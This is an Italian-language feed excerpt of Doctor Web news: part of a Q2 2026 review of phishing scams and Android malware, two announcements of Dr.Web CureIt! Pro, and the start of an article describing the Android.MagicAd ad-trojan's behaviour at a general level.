&lt;p&gt;Nel II trimestre continuavano ad essere attivi i truffatori che cercavano di rubare dati di account di vari servizi. Tra i numerosi siti di phishing c'erano false risorse internet di compagnie di trasporto. Una delle risorse era mirata ai clienti di uno dei servizi di consegna espressa russi. Alle potenziali vittime veniva suggerito di entrare nel proprio account in base al numero di cellulare legato all'account, o autenticarsi tramite il servizio web statale russo Gosuslugi. In particolare, dopo "l'accesso" all'account nel primo modo, il sito visualizzava comunque il secondo modulo di phishing con il pretesto di autenticazione tramite il servizio web Gosuslugi.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/07_fake_transport_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/07_fake_transport_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/08_fake_gos_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/08_fake_gos_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Tramite un sito fraudolento, i malintenzionati potevano rubare le credenziali di più account alla volta: dell'area personale della compagnia di trasporto e del portale web Gosuslugi&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I nostri esperti hanno individuato, inoltre, nuovi siti web di phishing di istituti creditizi di diversi paesi. Così, ai depositanti di una delle banche statunitensi i truffatori suggerivano di entrare nell'account e controllare la disponibilità di un tasso di interesse aumentato per i "clienti fedeli":&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/09_fake_usa_bank_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/09_fake_usa_bank_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/10_fake_usa_banklogin_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/10_fake_usa_banklogin_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;In un altro caso, il sito di phishing imitava l'aspetto esteriore di una delle banche di Ecuador e chiedeva agli utenti le credenziali dell'account di home banking:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/11_fake_ecuador_bank_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/11_fake_ecuador_bank_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Un altro schema di phishing era orientato agli utenti britannici. I cybercriminali creavano falsi siti di servizi pubblici, dove suggerivano di pagare una multa per parcheggio irregolare.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/12_fake_uk_parking1_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/12_fake_uk_parking1_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Alle potenziali vittime venivano chieste informazioni personali dettagliate — presumibilmente per l'identificazione, dopodiché gli utenti venivano reindirizzati alla pagina di pagamento della "multa".&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/13_fake_uk_parking2_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/13_fake_uk_parking2_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/14_fake_uk_parking3_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/14_fake_uk_parking3_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Uno dei popolari schemi fraudolenti rimane quello di suggerire l'ottenimento di vari bonus spettanti ai cittadini. I cybercriminali lo adattano però costantemente agli eventi attuali. Così, in previsione della Giornata della Russia, comparivano falsi siti di istituti di credito russi, su cui i malintenzionati promettevano ai visitatori pagamenti in occasione della festa. Su uno dei siti, agli utenti presumibilmente spetterebbero per la partecipazione a un sondaggio da 5.000 a 300.000 rubli russi:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/15_fake_russia_pay_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/15_fake_russia_pay_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;In un'altra variante dello schema, gli utenti, dopo aver partecipato a un sondaggio, presumibilmente potrebbero aspettarsi di ricevere un "sussidio" di 5.000 rubli russi:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/16_fake_russia_help_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/16_fake_russia_help_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Mentre sullo sfondo delle notizie speculative sulla carenza di carburante in alcune regioni russe, una serie di siti truffa prometteva buoni per ricevere gratis da 20 a 100 litri di benzina:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/17_fake_russia_fuel_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/17_fake_russia_fuel_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Dopo che i visitatori di questi siti rispondevano ad alcune semplici domande, per ottenere il premio promesso, veniva suggerito loro di effettuare "l'identificazione". Per fare ciò, dovevano indicare il nome e cognome, il numero di cellulare, nonché il numero della carta bancaria. In seguito, i malintenzionati erano in grado di utilizzare queste informazioni per rubare denaro alle vittime.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/18_fake_russia_payoutcard_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/18_fake_russia_payoutcard_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/19_fake_russia_payoutdata_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/19_fake_russia_payoutdata_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Tra i siti indesiderati rilevati nel II trimestre si riscontavano anche falsi portali internet di Federazione internazionale di calcio FIFA, sui quali gli utenti presumibilmente potrebbero acquistare ufficialmente biglietti per le partite del Campionato mondiale di calcio del 2026, articoli regalo di marca, nonché vari servizi premium. Similmente al sito vero, agli utenti di queste falsificazioni veniva suggerito di accedere all'account FIFA ID, tuttavia, il modulo di inserimento di login e password in questo caso accettava qualsiasi dato.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/20_fake_fifaid_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/20_fake_fifaid_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Falso modulo di accesso all'account FIFA ID&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Dopo che gli appassionati di calcio selezionavano una merce a cui erano interessati, veniva suggerito loro di formalizzare l'acquisto ed effettuare il pagamento. Durante il processo di pagamento, gli utenti giungevano al sito di un servizio che è presente nel database delle risorse internet non raccomandati dall'antivirus Dr.Web.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/21_fake_fifa_purchase_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/21_fake_fifa_purchase_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/22_fake_fifa_pay_q_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/22_fake_fifa_pay_q_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Falso sito di Federazione internazionale di calcio che presumibilmente consentirebbe di acquistare ufficialmente prodotti e servizi in licenza&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I nostri esperti hanno inoltre registrato una serie di campagne di spam studiate per distribuire link di falsi siti di marketplace russi, dove i malintenzionati invitavano le potenziali vittime a partecipare a "un'estrazione a premi correlata all'anniversario". I truffatori promettevano la possibilità di ottenere sia premi in denaro — fino a 1.000.000 di rubli russi, che apparecchiature informatiche e dispositivi mobili:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/23_fake_marketplace_prize1_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/23_fake_marketplace_prize1_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/24_fake_marketplace_prize2_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/24_fake_marketplace_prize2_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Per partecipare alla "promozione", gli utenti dovevano cliccare sul pulsante corrispondente su tali siti, dopodiché su di essi veniva simulata un'estrazione a premi. Dopo diversi tentativi, la potenziale vittima vedeva in una notifica che avesse vinto più regali, e che presumibilmente avesse la possibilità di scegliere se ricevere i premi stessi in un punto di ritiro del marketplace, o l'equivalente in denaro tramite bonifico al conto bancario:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/25_fake_marketplace_prize3_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/25_fake_marketplace_prize3_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Per partecipare alla "promozione", gli utenti dovevano cliccare sul pulsante corrispondente su tali siti, dopodiché su di essi veniva simulata un'estrazione a premi. Dopo diversi tentativi, la potenziale vittima vedeva in una notifica che avesse vinto più regali, e che presumibilmente avesse la possibilità di scegliere se ricevere i premi stessi in un punto di ritiro del marketplace, o l'equivalente in denaro tramite bonifico al conto bancario:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/26_fake_marketplace_prize4_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/26_fake_marketplace_prize4_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt; Dopo l'inserimento, i siti richiedevano il pagamento di una tassa statale — per la "formalizzazione ufficiale della vincita":&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/27_fake_marketplace_prize5_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/27_fake_marketplace_prize5_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;In realtà, le vittime dei truffatori non ricevevano alcun premio. Non solo trasferivano ai malintenzionati i dati delle proprie carte bancarie, ma anche donavano loro i propri soldi.&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="https://antifraud.drweb-av.it/dangerous_urls/"&gt;Scopri di più sui siti sconsigliati da Dr.Web&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Software malevoli e indesiderati per dispositivi mobili&lt;/h3&gt;

&lt;p&gt;Secondo i dati delle statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel II trimestre 2026 gli utenti riscontavano meno spesso i trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;, tuttavia, queste applicazioni trojan sono ancora il malware più diffuso. Inoltre, si osservava un altro calo dell'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;I programmi potenzialmente pericolosi più frequentemente rilevati nel II trimestre sono state le applicazioni &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Tool.NPMod&amp;lng=it"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;, che sono modificate tramite l'utility per il modding NP Manager. Gli attori di minacce utilizzano questo strumento per la protezione dei software malevoli dal rilevamento dagli antivirus. I programmi indesiderati più diffusi sono stati i falsi antivirus &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;. Per "risolvere" le presunte minacce trovate, richiedono di acquistare una versione completa.&lt;/p&gt;

&lt;p&gt;I più attivi software pubblicitari sono stati i moduli &lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;, che visualizzano notifiche fuorvianti e raccolgono dati riservati. Si sono diffuse di nuovo le applicazioni di ottimizzazione del funzionamento del SO Android &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Bastion&amp;lng=it"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. Creano notifiche di presunti memoria operativa insufficiente ed errori di sistema al fine di visualizzare la pubblicità durante "l'ottimizzazione". Rimanevano altamente attivi anche i programmi pubblicitari &lt;b&gt;Adware.Opensite.15&lt;/b&gt;. I malintenzionati li distribuiscono con il pretesto di programmi di cheat, tramite i quali gli utenti presumibilmente potrebbero ottenere varie risorse all'interno di un gioco. In realtà, questi programmi solo caricano siti con annunci pubblicitari.&lt;/p&gt;

&lt;p&gt;A giugno gli specialisti dell'azienda Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15262" target="_blank"&gt;hanno avvertito&lt;/a&gt; del trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, che è capace di aggirare le restrizioni del sistema operativo Android e visualizzare la pubblicità in background. &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; utilizza a questo scopo applicazioni di terze parti, nonché una serie di tecniche che esso seleziona a seconda del produttore del dispositivo target.&lt;/p&gt;

&lt;p&gt;Durante il II trimestre i nostri analisti dei virus hanno rilevato sullo store di app Google Play ulteriori programmi trojan delle famiglie &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;, che iscrivono gli utenti a servizi a pagamento. In totale, sono stati scaricati almeno 2.600.000 volte.&lt;/p&gt;

&lt;p&gt;Eventi più importanti relativi alla sicurezza "mobile" in II trimestre&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;I trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; continuano ad essere leader per il numero di rilevamenti di malware sui dispositivi protetti tramite Dr.Web.&lt;/li&gt;
    &lt;li&gt;I malintenzionati continuano a impiegare attivamente gli strumenti specializzati per il modding di programmi Android allo scopo di proteggere i trojan bancari dal rilevamento tramite antivirus.&lt;/li&gt;
    &lt;li&gt;Diminuisce di nuovo l'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;
    &lt;li&gt;Gli analisti dei virus Doctor Web individuano &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, un trojan che sfrutta programmi di terze parti per aggirare le restrizioni di SO Android e visualizzare pubblicità in background.&lt;/li&gt;
    &lt;li&gt;Sullo store di app Google Play sono rilevate nuove applicazioni trojan che iscrivono utenti a servizi a pagamento.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Per maggiori informazioni sulla situazione di virus per dispositivi mobili nel II trimestre 2026 leggete la nostra &lt;a href="https://news.drweb-av.it/show/review/?lng=it&amp;i=15274" target="_blank"&gt;panoramica&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15266&amp;lng=it</guid><title>Finalmente è qui! Dr.Web CureIt! Pro è rilasciata ed è disponibile gratis per tutti</title><link>https://news.drweb-av.it/show/?i=15266&amp;lng=it&amp;c=5</link><pubDate>Tue, 23 Jun 2026 12:08:24 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Ecco a voi Dr.Web CureIt! Pro — versione estesa dell'utility di cura diventata un punto di riferimento. È già operativa, e proprio adesso potete ottenerne l'accesso promozionale completamente gratis.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Come ottenere Dr.Web CureIt! Pro gratis&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;Per i nuovi utenti. &lt;/strong&gt;Andate al sito &lt;a href="https://free.drweb-av.it/download+cureit+free/?lng=it"&gt;free.drweb-av.it.&lt;/a&gt; Compilate il modulo standard per l'ottenimento del Dr.Web CureIt! regolare, e ricevete il link per il download di Dr.Web CureIt! Pro con una licenza per 1 giorno. Nessun pagamento nascosto — basta compilare il modulo e potete curare il proprio computer utilizzando le impostazioni estese.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Per gli utenti attuali della versione a pagamento di Dr.Web CureIt!.&lt;/strong&gt; Entrate nella propria Area personale, in essa è disponibile per il download il pacchetto di Dr.Web CureIt! Pro. Scaricate e utilizzate senza limitazioni durante tutto il periodo di validità della vostra licenza.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Vi ricordiamo che la versione Pro fornisce impostazioni flessibili di scansione, la gestione delle eccezioni, l'assegnazione manuale delle azioni per le minacce e statistiche estese.&lt;/p&gt;&lt;p&gt;Prestate attenzione! L'accesso promozionale gratuito per 1 giorno tramite il sito &lt;a href="https://free.drweb-av.it/download+cureit+free/?lng=it"&gt;free.drweb-av.it&lt;/a&gt; è un'offerta speciale che permette di valutare tutti i vantaggi della versione Pro senza pagare. L'offerta è valida fino al 30 giugno 2026 incluso.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;A partire dal 1 luglio 2026 saranno disponibili:&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;La classica versione gratuita di Dr.Web CureIt! per il download e la cura di emergenza;&lt;/li&gt;&lt;li&gt;La versione estesa dell'utility Dr.Web CureIt! Pro.&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Avete altre domande o avete notato un comportamento anomalo del programma? Le vostre opinioni sono molto importanti per noi. Scrivete i vostri commenti e suggerimenti nella &lt;a href="https://forum.drweb.com/index.php?showforum=92"&gt;discussione speciale &lt;/a&gt;in evidenza sul nostro forum ufficiale.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Scaricate Dr.Web CureIt! Pro oggi stesso e controllate il processo di cura in modo completo tramite le impostazioni estese! &amp;nbsp;&lt;/strong&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15268&amp;lng=it</guid><title>Dr.Web CureIt! diventerà ancora più comoda. Annuncio della versione Pro estesa</title><link>https://news.drweb-av.it/show/?i=15268&amp;lng=it&amp;c=5</link><pubDate>Wed, 10 Jun 2026 09:50:40 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Abbiamo analizzato il feedback dei nostri utenti e siamo giunti a una conclusione importante. In un momento critico, quando il computer è infetto, non sono necessarie impostazioni complesse — è necessaria una soluzione veloce, facile e affidabile, che si avvierà e curerà il sistema con un singolo pulsante.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Pertanto abbiamo revisionato i principi di utilizzo dell'utility. Il classico Dr.Web CureIt! gratuito resterà disponibile, ma sarà ancora più focalizzato sull'obiettivo principale: lo scaricate, fate clic su "Controlla" e il gioco è fatto. Questo è uno scanner affidabile fulminante per la cura di emergenza, che è capace di neutralizzare le minacce attive e far guarire il sistema.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;E per quelli che hanno bisogno di controllo sul processo?&lt;/strong&gt;&lt;br&gt;Non abbiamo rimosso le funzionalità estese. Al contrario, le abbiamo raccolte in un prodotto separato — Dr.Web CureIt! Pro — e lo abbiamo reso più comodo e accessibile. Se vi serve eseguire la scansione di un supporto rimovibile, escludere cartelle dalla scansione o configurare le azioni automatiche da applicare alle minacce rilevate — ottenete uno scanner flessibile con piene funzionalità per soldi minimi.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Come funzionerà&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Gratis e facilmente — scaricate il solito Dr.Web CureIt! e lanciate istantaneamente la scansione rapida. Questa è la soluzione ideale per le situazioni quando il tempo è un fattore critico.&lt;/li&gt;&lt;li&gt;Se vi serve una maggiore flessibilità — sul nostro sito o direttamente dalla versione gratuita potete acquistare Dr.Web CureIt! Pro e ottenere l'accesso a tutte le impostazioni estese.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Di conseguenza, offriamo una scelta consapevole: la facilità è gratis, la massima flessibilità è a una cifra simbolica: 5 euro per 5 giorni o 10 euro per 10 giorni.&lt;br&gt;Il rilascio di Dr.Web CureIt! Pro sarà già all'inizio di luglio. La settimana prima forniremo a tutti gli utenti l'accesso gratuito a tutte le funzionalità Pro in modo che possiate valutarle prima di prendere una decisione.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15262&amp;lng=it</guid><title>Trojan Android.MagicAd mostra annunci nonostante ogni restrizione</title><link>https://news.drweb-av.it/show/?i=15262&amp;lng=it&amp;c=5</link><pubDate>Fri, 05 Jun 2026 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Gli specialisti del laboratorio antivirus dell'azienda Doctor Web hanno rilevato un programma trojan, denominato Android.MagicAd, che con vari metodi aggira le restrizioni del sistema operativo Android e visualizza la pubblicità al funzionamento in background. Uno dei metodi è universale, gli altri sono progettati per dispositivi di produttori specifici. Includono lo sfruttamento di applicazioni di terze parti, nonché l'utilizzo del lettore multimediale di sistema.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; veniva distribuito attraverso lo store ufficiale delle app per dispositivi Xiaomi GetApps ed era nascosto in più di 50 vari giochi e programmi. Comparivano nello store per un breve periodo — il più delle volte, fino a un mese, dopodiché scomparivano, e al loro posto ne comparivano di nuovi. Probabilmente, i malintenzionati cercavano in questo modo di proteggere &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; dal rilevamento prematuro, mantenendo, allo stesso tempo, la sua attività, in quanto, dopo la rimozione dallo store, i programmi trojan rimangono sui dispositivi degli utenti e possono continuare a svolgere le operazioni malevole. Al momento, nessuna delle applicazioni con &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; da noi rilevate è disponibile per il download su GetApps, e gli sviluppatori che le distribuivano hanno smesso di pubblicare nuovi programmi con il trojan.&lt;/p&gt;

&lt;p&gt;Lo studio effettuato dagli analisti dei virus Doctor Web ha mostrato che le prime versioni di &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; sono emerse nel 2025 e, oltre allo store di app GetApps, si trovavano anche su Samsung Galaxy Store.&lt;/p&gt;

&lt;div class="img img-two"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Esempi di giochi e programmi dallo store di app GetApps che contenevano Android.MagicAd.1. Al momento della pubblicazione della nostra notizia, queste e altre varianti del trojan non sono più disponibili per il download&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Parte delle funzionalità malevole di &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; si trova nei moduli dex che sono nascosti in librerie native cifrate nella directory con le risorse file del trojan. Nel corso del funzionamento, il malware decifra queste librerie, ne estrae i propri componenti e li esegue.&lt;/p&gt;

&lt;p&gt;Prima di iniziare a visualizzare annunci pubblicitari, il trojan esegue una serie di controlli per assicurarsi che il suo ambiente sia sicuro. Ad esempio, cerca segni di operazione in ambiente virtuale, controlla se la sua installazione è stata organica e se l'indirizzo IP del dispositivo infettato non è presente sulla sua blacklist ecc.&lt;/p&gt;

&lt;p&gt;Se &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; non rileva attività sospette, nasconde la propria icona dalla lista dei programmi nel menu della schermata principale. Quindi crea un canale di notifica, attraverso il quale avvia diversi servizi malevoli di persistenza, che sono necessari per il funzionamento in background con la finestra dell'applicazione malevola chiusa. In seguito, il pianificatore attività di &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; crea un task per il riavvio periodico dei servizi che controllano l'operazione del canale di notifica e, se necessario, riavviano questo canale. Inoltre, in caso di funzionamento su dispositivi con versioni di SO Android relativamente vecchie, il trojan avvia uno schermo virtuale per evitare che il sistema interrompa il funzionamento di uno dei suoi componenti.&lt;/p&gt;

&lt;p&gt;Per visualizzare la pubblicità in modalità background quando la sua finestra è chiusa, &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; impiega una serie di tecniche che vengono selezionate in base al produttore del dispositivo infetto. Esse vengono implementate senza la richiesta esplicita dell'autorizzazione di sistema &lt;span class="string"&gt;SYSTEM_ALERT_WINDOW&lt;/span&gt;, la quale permette a un'applicazione di essere visualizzata sopra altri programmi.&lt;/p&gt;

&lt;p&gt;Indipendentemente dal metodo utilizzato, tutti i banner pubblicitari vengono caricati come activity traslucida, il che consente al trojan di disegnarli sopra le finestre esistenti.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.png" data-fancybox=""&gt;
